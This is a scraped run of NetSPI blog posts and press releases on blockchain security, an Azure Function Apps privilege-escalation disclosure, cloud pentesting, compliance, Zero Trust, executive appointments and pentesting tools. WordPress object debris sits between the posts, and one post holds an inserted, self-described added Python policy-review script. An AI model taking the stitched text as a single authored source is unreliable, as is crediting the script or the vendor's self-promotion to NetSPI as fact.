Blockchain is an effective business strategy that extends beyond the buzz of cryptocurrencies. Businesses are using blockchain for real-time transactions and secure payments at scale. Blockchain deployments vary for every organization, but its many uses and successes so far make it a technology to keep researching.
Planning for cybersecurity at the beginning of blockchain exploration helps create more secure deployments, especially when working with valuable financial information. The six questions below can guide internal conversations to align resources around secure blockchain deployments. Get more blockchain security tips in our eBook, “5 Blockchain Security Fundamentals Every C-Suite Needs to Know.”
Definition of Blockchain, or Distributed Ledger Technology (DLT)
Distributed Ledger Technology (DLT), commonly known as “blockchain,” is a distributed database secured with cryptography. How this unfolds in practice has many interpretations, but one commonality runs through every blockchain use: every participant has a vested interest in the trustworthiness of the data. This creates an environment for secure transactions once the servers, or nodes, work together to establish the true state of the database.
“Blockchain is fundamentally a distributed database secured with cryptography.”
One example of blockchain use is smart contracts: code stored directly on the chain, much like a web application, that executes deterministically without depending on any one entity to run it. Smart contracts let the responsible parties exchange information, including transactions, without an intermediary.
The many unique use cases of blockchain give it vast appeal, but it may be particularly useful to organizations such as large financial institutions and retail groups.
Blockchain Security in Deployments
Much of the data handled with blockchain is considered sensitive, which makes it valuable to malicious actors. As with many newer technologies, vulnerabilities become an issue if security is not baked in from the start.
“Like any other technology, security flaws are typically discovered/introduced during integration, as opposed to being inherent to the technology itself.”
Blockchain security issues can emerge from container configurations, vulnerable contract code, or weak permission models, to name a few. Exploring blockchain uses through a cybersecurity lens puts organizations ahead of weaknesses or gaps before they turn into vulnerabilities.
6 Questions to Prioritize Blockchain Security
These guiding questions will help uncover expectations and requirements as companies continue blockchain research. Use them as a starting point to gain alignment between IT and security teams, as well as other internal departments that may be affected by blockchain use.
1. Are teams in my organization pursuing blockchain uses? Have they consulted the security team for potential risks? Do we have trusted providers in place for third-party blockchain pentesting? Are we rushing the development of DLT solutions without proper security processes in place?
2. What chain technologies are going to be part of our deployments? Are these public/permissionless chains like Ethereum or Bitcoin? Or do we want to work with a permissioned chain system like Hyperledger?
3. Are we developing or deploying smart contracts? Do we have a secure SDLC process developed for DLT? Is our development team properly trained in the security considerations of the chain? How will we support contract updates and security fixes? Do we have a code audit plan in place?
4. Are we running our own nodes as part of the chain use? Will these be deployed on-premises, in Azure/AWS, or via a managed provider like IBM or Oracle? Have we considered configuration reviews for the supporting containers and hosts? Do we have threat models for other malicious nodes on the chain? Have we considered supply-chain threats for the code base?
5. Are we performing any custodial or direct ownership of digital assets? Are transaction signing and logic part of our solution? How are we securely managing cryptographic keys? Do we have a key recovery process in place? Are we relying entirely on third-party APIs to access the chain?
6. Are we integrating with any off-chain assets (databases, APIs, etc.)? Have we mapped out threat scenarios related to state desynchronization? Are we properly leveraging the native security of chain transactions for key logic? Are we storing sensitive data on the chain?
Make Blockchain Security Part of Your Strategy
The goal of DLT is to create a shared database that can be trusted by multiple entities that don’t necessarily trust one another. Blockchain is the answer to this challenge, but it is a newer technology whose full potential is still being realized.
[post_title] => 6 Questions to Plan for Blockchain Security
[post_excerpt] => These six questions will help teams plan for blockchain security from the start to get ahead of potential gaps that can result in vulnerabilities.
[post_modified] => 2023-03-27 15:22:53
[post_date] => 2023-03-23 08:00:00
Cloud penetration testing leader identifies privilege escalation flaw in Azure’s popular solution for building cloud-native applications.
Minneapolis, MN – NetSPI, the leader in offensive security, today published details on a vulnerability found by Vice President of Research Karl Fosaaen, who discovered flawed functionality in Azure Function Apps that allowed privilege escalation.
Fosaaen and the NetSPI research team worked closely with Microsoft to resolve the issue. If left unresolved, users with ‘read only’ permissions on a Function App could gain full access to the Azure Function App container, granting them the ability to view and alter highly sensitive information, like backend code databases and password vaults.
Function Apps is used for building cloud-native applications in Azure. At its core, Function Apps is a lightweight API service that can be used for building and hosting serverless applications. The Azure Portal allows users to view files associated with the Function App, along with the code for the application endpoints.
“We see the Function Apps service used in about 80 percent of our penetration testing environments. With this being a privilege escalation issue, a minimally authorized user could have been given access to critical, often restricted roles that would allow them to pivot within an Azure subscription,” said Fosaaen. “Given the simplicity of the issue, it’s surprising that this vulnerability has made it this far without previously being detected, especially with the rise in APIs and cloud-native apps over the past few years.”
https://youtu.be/ClCeHiKIQqE
Fosaaen worked closely with the Microsoft Security Response Center (MSRC) to disclose and remediate the file access issues. The Reader role no longer has the ability to read files with the Function App VFS APIs. A technical overview of the vulnerability can be found on the NetSPI blog.
The NetSPI Labs innovation and research group plans to continue exploring read-only privilege escalation opportunities across Azure. You can see the team’s cloud security research and past vulnerability disclosures at www.netspi.com.
About NetSPI
NetSPI is the leader in enterprise penetration testing, attack surface management, and breach and attack simulation – the most comprehensive suite of offensive security solutions. Through a combination of technology innovation and human ingenuity, NetSPI helps organizations discover, prioritize, and remediate security vulnerabilities. For over 20 years, its global cybersecurity experts have been committed to securing the world’s most prominent organizations, including nine of the top 10 U.S. banks, four of the top five leading global cloud providers, four of the five largest healthcare companies, three FAANG companies, seven of the top 10 U.S. retailers & e-commerce companies, and the top 50 companies in the Fortune 500. NetSPI is headquartered in Minneapolis, MN, with global offices across the U.S., Canada, the UK, and India.
Cloud computing has transformed the way organizations operate, providing unparalleled flexibility, scalability, and cost-efficiency. However, with these benefits come new security challenges and emerging risks. As organizations increasingly move their operations to the cloud, ensuring the security and privacy of data has become more critical than ever. A robust cloud penetration testing program helps internal IT teams protect their organizations by identifying and mitigating security risks in the cloud.
A pitfall organizations face when building a cloud pentesting strategy is handling rapid cloud migration. An application hosted on-prem will have significantly different security requirements from one in the cloud, and cloud security controls can often be more complex, with intricate nuances. Another pitfall is assuming that cloud services are secure by default. Even though the cloud provider manages some aspects of security, organizations still have a responsibility to understand exactly what is within their control to secure. The default settings from the cloud provider are not always the most secure for every environment. This differs from a traditional security program because of the shared responsibility, or "shared fate," model.
With this model in mind, organizations need to look at the key components of a comprehensive cloud penetration testing program in light of their business objectives to implement a secure cloud effectively.
Best Practices to Create a Cloud Penetration Testing Program
Creating a secure cloud is a complex undertaking with decisions that need to be tailored to your business goals and tech stack. Thomas Elling and the Cloud Pentesting team have compiled three aspects of creating a cloud pentesting program that will help any team incorporate security protocols from ideation to deployment.
1. Building a secure cloud from the start
Making security-conscious design decisions from the start of a cloud adoption helps IT teams avoid retroactive decisions that result in rework and disjointed integration of technologies. It’s important to consider this from both a human element and a technical one. From the human lens, consider partnering security engineers and pentesters with DevOps groups to create secure-by-default environments. From a technical standpoint, consider adopting Infrastructure as Code (IaC) to help enforce a security baseline.
2. Performing regular configuration reviews and pentesting
Regular configuration reviews and cloud pentesting exercises are extremely valuable because of their ability to focus remediation efforts on prioritized vulnerabilities. Identifying security misconfigurations is a critical first step to securing an environment, which makes configuration reviews so imperative. They should be done on a regular basis to identify factors such as inadvertent public access or excessive IAM permissions.
Pentesting is another integral part of cloud security which aims to demonstrate the impact of the identified misconfigurations. This often includes chaining misconfigurations together to prove privilege escalation. The key difference between this and a typical configuration review is the fact that pentests leverage misconfigurations to demonstrate the potential impact of a successful attack. Oftentimes, the full impact of a misconfiguration is not fully understood until it is paired with one or more other vulnerabilities in the environment.
3. Establishing security guardrails
Guardrails are sets of automated policies and controls that are designed to prevent or mitigate security risks and ensure compliance with security standards and regulations. Results of configuration reviews and pentests should always be discussed to identify the root cause. If a vulnerability was introduced via configuration drift, one preventative action would be implementing a security guardrail to ensure that misconfigurations cannot be introduced in the future.
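As an added illustration of the review and guardrail ideas in sections 2 and 3 above (example code written for this edit, not NetSPI's tooling), the following Python script runs a small configuration-review check over constructed IAM and S3 bucket policy documents. It flags the two factors named above, inadvertent public access and excessive IAM permissions, and exposes the same check as a guardrail function that a deployment pipeline could call to reject a policy before it is applied. The policy names, ARNs and VPC id are constructed placeholders.

```python
"""Constructed configuration-review check over IAM/S3 policy documents.

Added example for this page; not NetSPI's tooling. Names, ARNs and the VPC id
are placeholders.
"""

# Constructed sample policy documents keyed by a hypothetical resource name.
SAMPLE_POLICIES = {
    # Excessive IAM: every action on every resource.
    "ci-deploy-role": {
        "Version": "2012-10-17",
        "Statement": [{"Effect": "Allow", "Action": "*", "Resource": "*"}],
    },
    # Broad service access: all of S3 on every resource.
    "logs-role": {
        "Version": "2012-10-17",
        "Statement": [{"Effect": "Allow", "Action": "s3:*", "Resource": "*"}],
    },
    # Inadvertent public access: anonymous read with no Condition.
    "reports-bucket": {
        "Version": "2012-10-17",
        "Statement": [{
            "Sid": "PublicRead", "Effect": "Allow", "Principal": "*",
            "Action": "s3:GetObject",
            "Resource": "arn:aws:s3:::example-reports-bucket/*",
        }],
    },
    # Anonymous principal but restricted to one VPC: needs review, not a block.
    "vpc-only-bucket": {
        "Version": "2012-10-17",
        "Statement": [{
            "Effect": "Allow", "Principal": "*", "Action": "s3:GetObject",
            "Resource": "arn:aws:s3:::example-internal-bucket/*",
            "Condition": {"StringEquals": {"aws:SourceVpc": "vpc-PLACEHOLDER"}},
        }],
    },
    # Least-privilege role: named actions on one prefix; no findings expected.
    "app-role": {
        "Version": "2012-10-17",
        "Statement": [{
            "Effect": "Allow", "Action": ["s3:GetObject", "s3:PutObject"],
            "Resource": "arn:aws:s3:::example-app-data/*",
        }],
    },
}

# Finding codes that the guardrail refuses to let into the environment.
BLOCKING = {"EXCESSIVE_IAM", "PUBLIC_ACCESS"}


def _as_list(value):
    """IAM allows a string or a list in most fields; normalise to a list."""
    return value if isinstance(value, list) else [value]


def _principal_is_anonymous(principal):
    """True for Principal "*" or {"AWS": "*"} (anyone, including unauthenticated)."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        return "*" in _as_list(principal.get("AWS", []))
    return False


def review_policy(name, policy):
    """Return (name, code, detail) findings for one policy document."""
    findings = []
    for stmt in _as_list(policy.get("Statement", [])):
        if stmt.get("Effect") != "Allow":
            continue  # Deny statements only narrow access
        actions = _as_list(stmt.get("Action", []))
        resources = _as_list(stmt.get("Resource", []))
        if "*" in actions and "*" in resources:
            findings.append((name, "EXCESSIVE_IAM",
                             "Allow with Action '*' on Resource '*'"))
        elif "*" in resources and any(a.endswith(":*") for a in actions):
            findings.append((name, "BROAD_SERVICE_ACCESS",
                             "service-wide wildcard action on Resource '*'"))
        if "Principal" in stmt and _principal_is_anonymous(stmt["Principal"]):
            if stmt.get("Condition"):
                findings.append((name, "CONDITIONAL_PUBLIC",
                                 "anonymous principal limited by a Condition; verify"))
            else:
                findings.append((name, "PUBLIC_ACCESS",
                                 "anonymous principal with no Condition"))
    return findings


def review_all(policies):
    """Configuration review: findings across every policy in the inventory."""
    findings = []
    for name, policy in policies.items():
        findings.extend(review_policy(name, policy))
    return findings


def guardrail_allows(policy):
    """Preventive use: True only if the policy carries no blocking finding."""
    return not any(code in BLOCKING
                   for _, code, _ in review_policy("candidate", policy))


if __name__ == "__main__":
    for name, code, detail in review_all(SAMPLE_POLICIES):
        print(f"{name}: {code} - {detail}")
```

The check deliberately treats an anonymous principal that is limited by a Condition as something to verify rather than block, because a bucket policy scoped to aws:SourceVpc is a common legitimate pattern; the root-cause discussion this section recommends is what decides whether such exceptions belong in the guardrail's allow-list rather than in a blanket rule.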
Whether your cloud infrastructure resides in AWS, Azure, or GCP, these three fundamentals will help internal teams build — and maintain — a secure cloud from all angles.
Refine Your Cloud Pentesting Program with NetSPI
These steps represent some of the basic ways to create a security-first cloud environment through regular review processes. While there is no one-size-fits-all approach, these points can be modified to fit any cloud environment. Ultimately, organizations should prioritize remediation of vulnerabilities with a risk-based approach.
Environments that carry higher risk, such as ones that deal with sensitive data or may have external exposure, would be candidates for more frequent reviews. One factor that could trigger a review is any fundamental change made by the cloud provider to a core service.
However, this is not to say that lower-risk environments, like a dev environment with test data, are not important. Escalation paths from dev environments into production can be extremely impactful. Lastly, organizations looking to build out and strengthen their cloud pentesting programs need to investigate the root cause of identified vulnerabilities to ensure that the same, or similar, issues do not happen again.
Working with a penetration testing partner to enhance cloud security can help streamline efforts and deliver value quickly. As a leader in offensive security, NetSPI helps companies establish and enhance their secure cloud strategies. Contact our security consultants to get started on a strong cloud penetration testing program.
[post_title] => 3 Fundamentals for a Strong Cloud Penetration Testing Program
[post_excerpt] => The cloud reigns supreme, making it a target for threat actors. Learn the basics of creating and enhancing a secure cloud penetration testing program.
[post_modified] => 2023-03-20 15:46:28
[post_date] => 2023-03-14 09:00:00
NetSPI Field Chief Information Security Officer (CISO) and host of the Agent of Influence podcast Nabil Hannan invited Marc Rubbinaccio, Senior Compliance Manager at Secureframe, onto episode 53 to discuss how security fits into compliance, and vice versa.
The conclusion? Compliance doesn’t equate to security, but it is a strong starting point. Cybersecurity compliance provides a trustworthy baseline to establish a more mature security posture, especially for companies that are beginning to build their cybersecurity program from the ground up.
Dive into the highlights below, then head over to Agent of Influence and listen to the full episode.
Reframing the Mentality of Cybersecurity Compliance
The sentiment around compliance often centers on meeting requirements, not building an effective security program — but Marc offers a refined perspective. He suggests that this mentality may be more prevalent at enterprise organizations with advanced security processes, making the baseline security controls outlined in compliance more of a check-the-box exercise, as opposed to a preventative cybersecurity strategy.
But following the baseline security controls outlined in security frameworks is a prime starting point for small businesses and growing organizations.
Technology is evolving faster than compliance can keep up with, which has led the PCI DSS council to allow a more customized approach to meeting requirements. This allows companies to keep their current systems and implementations in place, without the need to invest in expensive new technologies. If companies can prove that what they’ve implemented meets the intent of the requirement, then these revised standards within PCI DSS v4.0 allow security teams to stay the course.
Choosing a Security Compliance Framework
Common company activity that requires cybersecurity compliance includes storing, processing and transmitting data in a way that can impact the security of customer information. Marc advises listeners to first select a cybersecurity framework that could be required within their industry. For example, HIPAA for healthcare, or GDPR for organizations responsible for the privacy of European customer data. Choosing a security framework and sticking to it helps guide decisions throughout the many steps within a compliance journey.
“In my opinion, SOC2 and ISO27001, these frameworks are an amazing way for startups and small businesses to build a baseline security posture that they can not only be proud of but also be confident that their customers’ data is indeed secure.”
Marc Rubbinaccio, Secureframe
Marc recommends two frameworks for organizations starting their path toward cybersecurity compliance:
SOC 2: The American Institute of Certified Public Accountants (AICPA) centers the SOC 2 framework around five Trust Services Criteria: security, availability, processing integrity, confidentiality, and privacy.
ISO 27001: The International Organization for Standardization (ISO), in partnership with the International Electrotechnical Commission (IEC), developed ISO 27001 as its current standard for information security. ISO 27001 encourages the adoption of an Information Security Management System (ISMS) to protect the confidentiality, integrity, and availability of information.
These well-known security frameworks help organizations establish policies and procedures, access control, change management, and even risk management, resulting in an inherently stronger cybersecurity posture.
Changes to PCI DSS v4.0
Marc’s area of focus is PCI DSS, which recently released an updated version, PCI DSS v4.0. Changes include stricter multifactor authentication and stronger password security requirements, among others. The organizations most impacted by these changes are the ones maintaining Self-Assessment Questionnaire A (SAQ A), which applies when merchants outsource all aspects of payment processing, such as capture, storage, and transmission of cardholder data, to a third-party service provider.
These changes were driven by the increase in e-skimming attacks on payment pages, in which script running in the customer’s browser intercepts private information as it is entered into a web form. To help combat these increasing attacks, SAQ A now requires controls around any script executed in the customer’s browser, in addition to external vulnerability scanning.
With all of these never-ending changes, what can internal IT teams do to keep up with security compliance?
“The strongest and most powerful tool you have are the experts that you work with.”
Marc Rubbinaccio, Secureframe
How Organizations Can Prepare for Changes to Security Compliance
Keeping up with all the changes to compliance standards is difficult, which is why leaning on the people and tools around you is essential. When looking at best practices for keeping up with changes to security compliance, use your connections as a resource.
Whether your organization partners with a third party or uses a particular auditor, you can lean on these experts for guidance on decisions to adhere to your chosen framework. It's OK to reach out directly to your auditor to discuss the latest changes to the frameworks and how they may affect your environment as it stands today. These conversations will put you ahead of the game when it’s time for your next audit.
The Intersection of Pentesting and Security Compliance
Penetration testing is critical in vulnerability management programs because it takes vulnerability scanning a step further. Scanners fingerprint operating system and software versions and compare them against publicly released vulnerable versions, and they fuzz, or mass-inject data into, input fields to discover vulnerabilities. They are a great tool for identifying assets and surface-level vulnerabilities, while pentesting uses the data found by scanners to try to exploit a vulnerability and continue to pivot within your environment.
The additional steps performed by penetration testing help internal teams discover deeper issues within their environment, prioritize risks, and remediate gaps. Compliance frameworks have recognized how important pentests are, with some of them, including PCI, FedRAMP, and HITRUST, requiring penetration testing annually and when significant changes occur.
Compliance doesn’t equate to security, but these well-known frameworks are a strong starting point. Keep growing your security compliance education by listening to Marc’s podcast episode here.
[post_title] => How to Build a Baseline Cybersecurity Posture with Security Compliance
[post_excerpt] => Compliance manager Marc Rubbinaccio joins NetSPI to discuss how a secure environment and security compliance go hand-in-hand.
[post_modified] => 2023-03-17 14:48:49
[post_date] => 2023-03-07 09:00:00
On Episode 46 of NetSPI’s Agent of Influence podcast, host and NetSPI Field Chief Information Security Officer (CISO) Nabil Hannan invited Hudl CISO Rob LaMagna-Reiter to discuss a future-focused approach to Zero Trust. They cover three misconceptions IT teams typically encounter throughout Zero Trust implementation, as well as broader topics including the definition of Zero Trust, reputable frameworks to reference, and long-term budgeting for an enhanced cybersecurity strategy. Read the recap below for the top takeaways, then head over to our podcast page to listen to the full episode.
3 Misconceptions of Zero Trust Implementation
One of the conversations on this episode centered around common misconceptions teams face when they plan for Zero Trust. The modern cybersecurity model presents universal challenges on the path to a greater end state of cybersecurity that can stall organizations on their progress. Help internal teams move beyond these common blockers and continue momentum on security initiatives by learning about the counterpoints to Zero Trust misconceptions.
Misconception #1: Zero Trust is identity, or Zero Trust is the new perimeter.
Truth: Identity is an important aspect of Zero Trust, but no singular pillar comprises Zero Trust.
The chatter around Zero Trust is dense, leading to mixed messages around what Zero Trust is and isn’t. Vendors can perpetuate this confusion by labeling products as Zero Trust or selling a one-and-done solution that promises relentless security. While identity is an important pillar in Zero Trust, it is only one aspect of the overarching strategy. Having too narrow a focus on a singular pillar leaves gaps in Zero Trust implementation, keeping your company in the crosshairs of a potential breach.
https://youtube.com/shorts/91TPs4HGww0
Misconception #2: Zero Trust is a product.
Truth: Zero Trust is a methodology to achieve a greater end state of cybersecurity.
Again, the varied messages about Zero Trust from vendors who sell a single solution dilute its meaning as an overall strategy. Zero Trust is not a product or a platform, and no single solution can achieve Zero Trust. It is a framework for organizations to approach more secure systems and align their internal thinking to systematically enhance security across many areas of a business.
Misconception #3: Zero Trust is a complicated dream state that isn’t possible to achieve.
Truth: Taking incremental steps toward Zero Trust by following a roadmap tailored to your organization decreases the intimidation of Zero Trust and provides quick wins to build momentum for continued progress.
This is the most common misconception we hear in conversations. Zero Trust is complex, and when trying to solve for everything at once, it can seem overwhelming. Following a Zero Trust roadmap with relevant KPIs tailored to your organization is the key to success. This can include mapping out data flows and the attack surface, and building a strategy around identifying, classifying, and tagging critical applications.
“The most complicated thing about Zero Trust is it actually forces you to understand your business deeply. It forces you to know more about the business than the business might know about itself.”
– Rob LaMagna-Reiter, CISO at Hudl
While many misconceptions about Zero Trust exist, these three examples present nearly universal scenarios for any company aspiring to implement Zero Trust or continue its expansion. Zero Trust is a complex methodology, but internal teams can find support by partnering with technology vendors who specialize in cybersecurity.
Plan for Zero Trust Implementation Guidance Tailored to Your Business Goals
Zero Trust implementation uncovers what is normal and what isn’t for any business. This deep understanding allows for the creation of a strategy to guide the development of steps within Zero Trust, while remaining flexible to adapt to the business as it evolves.
Listen to the full interview on episode 46 of the Agent of Influence podcast where we expand on how to talk with internal stakeholders about Zero Trust in ways that resonate with them. If you’re ready to make progress on your Zero Trust implementation, contact NetSPI’s Strategic Advisory team to get started.
[post_title] => 3 Misconceptions with Zero Trust Implementation
[post_excerpt] => Zero Trust implementation is different for every company, but these common misconceptions present universal scenarios most teams face.
[post_modified] => 2023-03-03 15:59:26
[post_date] => 2023-03-06 08:00:00
Seasoned cybersecurity and finance executives Vinay Anand and Jay Golonka will guide product and growth strategies for the offensive security leader.
Minneapolis, MN – NetSPI, the leader in offensive security, today announced two C-Suite leadership appointments, Chief Product Officer (CPO) Vinay Anand and Chief Financial Officer (CFO) Jay Golonka. They bring decades of experience supporting high-growth technology companies and will be instrumental in leading NetSPI’s technology growth.
"These appointments signal pivotal transformation for NetSPI, as we continue to evolve our technology platforms to meet the offensive security needs of the modern enterprise," said Aaron Shilts, CEO at NetSPI. "Vinay and Jay will play a key role in delivering the highest quality security solutions at-scale and maintaining profitable growth."
Anand is a seasoned technology leader, most recently supporting Palo Alto Networks’ Prisma Cloud as VP of Product. He will oversee NetSPI’s product strategy across the entire portfolio of offensive security solutions. This includes Penetration Testing as a Service (PTaaS), Attack Surface Management (ASM), and Breach and Attack Simulation (BAS), along with future, complementary technology investments. Over the last 20 years, he has led product strategy, engineering, marketing, and business development for a variety of security, software, and networking products. He has held leadership roles with Anthos, Google’s managed hybrid cloud platform, as well as IBM Security, McAfee, and Cisco Systems.
"The need to enable enterprise security professionals to accurately assess their risks in real time has never been more urgent and necessary," said Anand. "NetSPI is uniquely positioned to deliver on this mandate with their platform driven, human delivered methodology. I’m excited to join the team as their first Chief Product Officer to continue the momentum they’ve built bringing high-value, high-fidelity solutions to the industry."
Golonka brings over 25 years of experience leading high performing finance teams through periods of rapid growth. At NetSPI he will focus on scaling the team and providing actionable business insights across the organization. Previously, Golonka was the CFO at PE-backed software company Prometheus Group. During his time there, he led them through nine acquisitions. Jay spent 18 years in public accounting and had finance leadership positions at two other high-growth software companies before joining Prometheus Group. Over his career, he has worked with organizations as they navigate the public company environment, including organizations going through the formal IPO process.
"I was immediately aligned with NetSPI’s vision to expand the breadth and scale of their solutions," said Golonka. "They’ve experienced incredible growth by providing impactful solutions to real problems in the industry – and show no signs of stopping. I look forward to being a contributing part of the journey."
NetSPI is the leader in enterprise penetration testing, attack surface management, and breach and attack simulation – the most comprehensive suite of offensive security solutions. Through a combination of technology innovation and human ingenuity, NetSPI helps organizations discover, prioritize, and remediate security vulnerabilities. For over 20 years, its global cybersecurity experts have been committed to securing the world’s most prominent organizations, including nine of the top 10 U.S. banks, four of the top five leading global cloud providers, four of the five largest healthcare companies, three FAANG companies, seven of the top 10 U.S. retailers & e-commerce companies, and many of the Fortune 500. NetSPI is headquartered in Minneapolis, MN, with global offices across the U.S., Canada, the UK, and India.
Veteran security industry executives appointed to support offensive security leader’s next stage of growth.
Minneapolis, MN – NetSPI, the leader in enterprise penetration testing and offensive security, today announced the appointment of Scott Lundgren and John Spiliotis to its Board of Directors. The two veteran security industry executives will help support the company’s next stage of growth following a year of record momentum.
“We’re honored to have Scott and John join our Board during such an exciting, pivotal time for NetSPI,” said Aaron Shilts, CEO of NetSPI. “Their proven track records of building and advising high-growth cybersecurity companies, combined with their passion for empowering the next generation of business leaders, will be invaluable as we continue to innovate and scale.”
With over two decades of technology and security industry experience, Lundgren currently serves as the Chief Technology Officer at VMware Carbon Black. Having taken the journey with Carbon Black as a founding member, through IPO in 2018, and the VMware acquisition in 2019, he brings a long history of balancing technology requirements under the pressure of rapid business growth. Lundgren has a foundational understanding of offensive security, beginning his cybersecurity career penetration testing for the U.S. Air Force.
“Penetration testing is an area of security that benefits from the underlying expertise of the team and the rigor with which the work is performed and communicated,” said Lundgren. “NetSPI has built an incredible team of offensive security experts, with a hands-on, customer-first approach that stands out in the industry. I look forward to being part of NetSPI’s growth story.”
Spiliotis currently serves as a sales and go-to-market (GTM) advisor with NetSPI investor KKR. Prior to his advisory engagement with the global investment firm, he held several executive sales positions with high-growth technology companies, most recently serving as the Senior Vice President of Sales at Palo Alto Networks. Spiliotis also serves on the Board of Directors for ReliaQuest and is a GTM advisor for various other cybersecurity companies.
“Two years ago, I was introduced to NetSPI through KKR’s Next-Generation Technology growth portfolio. Immediately, they impressed me with their momentum, energy, and value proposition,” said Spiliotis. “NetSPI has the right ingredients to continue achieving massive success. I’m honored to join the Board, where I’ll continue to help NetSPI maximize its opportunity and support employee development in the sales organization alongside the leadership team and my partners at KKR.”
NetSPI is the leader in enterprise penetration testing and attack surface management. Today, NetSPI offers the most comprehensive suite of offensive security solutions – penetration testing as a service, attack surface management, and breach and attack simulation. Through a combination of technology innovation and human ingenuity NetSPI helps organizations discover, prioritize, and remediate security vulnerabilities. For over 20 years, its global cybersecurity experts have been committed to securing the world's most prominent organizations, including nine of the top 10 U.S. banks, four of the top five leading global cloud providers, four of the five largest healthcare companies, three FAANG companies, seven of the top 10 U.S. retailers and e-commerce companies, and 50 percent of the Fortune® 50. NetSPI is headquartered in Minneapolis, MN, with global offices across the U.S., Canada, the UK, and India. Follow NetSPI on Twitter and LinkedIn.
[post_title] => NetSPI Appoints Scott Lundgren and John Spiliotis to its Board of Directors
[post_excerpt] => Carbon Black founding member and KKR advisor join the NetSPI Board of Directors to support the company’s next stage of growth.
[guid] => https://www.netspi.com/?p=29454
[7] => WP_Post Object
[post_date] => 2023-02-14 08:00:00
In this overview of 36 notable vendors, Forrester explores the benefits of External Attack Surface Management (EASM) and key functionalities to consider when selecting a partner.
Minneapolis, MN – NetSPI, the leader in enterprise penetration testing and attack surface management is recognized in The External Attack Surface Management Landscape, Q1 2023, authored by global research and advisory firm Forrester. The Landscape report aims to help organizations understand the value of EASM solutions and provides security professionals with an overview of notable vendors so they can select a solution based on their needs.
“The attack surface management market has seen incredible innovation and evolution. This report examines the benefits EASM brings to global enterprises – increased asset visibility, continuous pentesting, and better risk prioritization, to name a few,” said Jake Reynolds, Head of Emerging Technology at NetSPI. “We believe we play an important role in this market and are honored to be recognized by Forrester.”
In the report, Forrester defines EASM as “tools or functionalities that continually scan for, discover, and enumerate internet-facing assets, establish the unique fingerprints of discovered assets, and identify exposures on both known and unknown assets.” EASM vendors recognized alongside NetSPI all have varying features and use cases.
As mentioned in the research, NetSPI reports that its Attack Surface Management (ASM) solution is selected by clients for most or all of the use cases identified by Forrester. Forrester’s complete list of included use cases is:
Asset discovery
Asset inventory management
Vulnerability risk management
Cloud security posture management
Mergers and acquisitions (M&A) due diligence assistance
Supply chain/third-party risk management
Penetration testing
Governance, risk, and compliance (GRC)
Incident response and investigations
Breach and attack simulations (BAS)
Certificate management
NetSPI is listed as a managed service offering, with an industry focus in financial services, high-tech, and media. Visit www.netspi.com to schedule a demo of NetSPI’s ASM platform.
On February 2, NetSPI Managing Director Ron Kuriscak was featured in the SecurityWeek article Cyber Insights 2023 | Regulations. Read the preview below or view it online.
+++
SecurityWeek Cyber Insights 2023 | Regulations – In this world, nothing is certain but death, taxes, and cyber regulations. The first is static, the second goes up and down, but the third seems only to increase. The three primary drivers for cyber regulations are voter privacy, the economy, and national security – with the complication that the first is often in conflict with the second and third.
Transatlantic data flows
Privacy is the headline battleground going forward, and amply illustrates the conflict between voter demands and national economies. This can be seen in the unsettled but multi-year attempt to find a legal solution to the transfer of personal user data from Europe to the US. Economics demands it, but European law (GDPR) and swathes of European public opinion deny it.
At the time of writing, it is almost certainly illegal to transfer PII from Europe to the US. The Privacy Shield – the second attempt at finding a workaround to GDPR – was declared illegal in what is known as the Schrems II court ruling. The wording of that ruling almost certainly eliminates an alternative approach known as ‘standard contractual clauses’.
During 2022, the European Commission (EC) and the US Biden administration have worked on developing a replacement for Privacy Shield. The ball was obviously in the US court, and on October 7, 2022, Biden issued an Executive Order to implement the EU-US Data Privacy Framework agreement – sometimes known as Privacy Shield 2.0.
This was enthusiastically greeted by US business. IBM, for example, issued a statement, “These steps will restore certainty to the thousands of companies already self-certified under Privacy Shield. Providing predictable, free flows of data between the US and the EU will secure the mutual benefits of continued business cooperation and will create a foundation for future economic growth.”
Finally
Martin Zinaich, CISO at the City of Tampa, once suggested to SecurityWeek, “If it ain’t required, it ain’t gonna happen.” We may have reached the point, with better organized cybercriminals and more aggressive nation states, where it must happen and therefore must be required.
Ron Kuriscak, MD at NetSPI, certainly believes so. “Regulations need to become much more mature, stringent, and punitive. We must hold organizations more accountable for their inaction in the area of cybersecurity… Organizations will be held accountable for basic cybersecurity hygiene. If they are unable to meet the most basic standards a regulator will require a third party to take over cybersecurity program execution (they will be mandated to cover the associated costs). Similar to the FDA, we will start seeing industry-aligned compliance regulations with real penalties that will force real compliance and organizational change. The key will be enforcement and penalties.”
Type “pentesting” into GitHub, and you’ll find nearly 9,000 repository results.
Finding the right penetration testing tools can be a daunting task, given the sheer number of both open source and commercial options available. Using the right tool for the right objective – from capturing and manipulating HTTP traffic to finding SQL injection during web application pentests – can make a significant impact during assessments.
To help narrow your search parameters, we surveyed our team of 200+ global pentesters to identify the 12 must-have pentesting tools of the moment. Drumroll please…
1. Burp Suite
Recognized as the industry standard in web application penetration testing, Burp Suite is primarily used to capture and manipulate HTTP traffic.
It combines a top-class proxy, a web vulnerability scanner, and an extensive ecosystem of extensions, making it invaluable for performing penetration tests. Burp Suite gives users a great level of control to uncover and exploit vulnerabilities while scanning for common web application flaws.
“I have used this tool nearly every day for over ten years. I have performed SQL Injections, server-side request forgeries, authentication/authorization bypasses, cross-site scripting, Java deserialization attacks, various code injections and remote code executions, and more.”
– Eric Gruber, Director, Attack Surface Management
“I use this tool for every pentest I do! For one test, I was able to intercept a file upload request and inject a malicious DTD to exploit server-side request forgery.”
– Karin Knapp, Security Consultant II
2. NMAP
NMAP (Network Mapper) is a popular pentesting tool used to assess networks for open ports and vulnerabilities. It has been around for many years, amassing a great deal of community support, excellent documentation, and expansive functionality. NetSPI’s global pentesting team uses it extensively in Attack Surface Management.
“We use it all the time in Attack Surface Management to identify open ports on our clients' attack surfaces. This is the first step in exploiting a large majority of vulnerabilities.”
3. NetSPI Resolve
Behind the scenes, Resolve is also a penetration testing workbench for our services team and select clients that purchase a subscription.
From a workbench perspective, it’s a one-stop shop for NetSPI pentesting assessments: it houses checklists, allows our consultants to communicate with clients, stores documents, and is a central platform to document findings.
Resolve’s checklists and finding templates help our pentesters be more consistent with their documentation and help in organizing a methodical and thorough testing process, a key reason why our consultants nominated it as a top tool.
The platform saves hours, even days, by taking the output from tools and sorting and correlating the findings. In addition, it can track findings and detections over time, which has enabled NetSPI to build out a large vulnerability repository with thousands of instructions for validating findings.
“Resolve takes care of 95% of the reporting process for me, so I can spend more time actually helping the client and doing my job.”
- Cameron Geehr, Managing Consultant
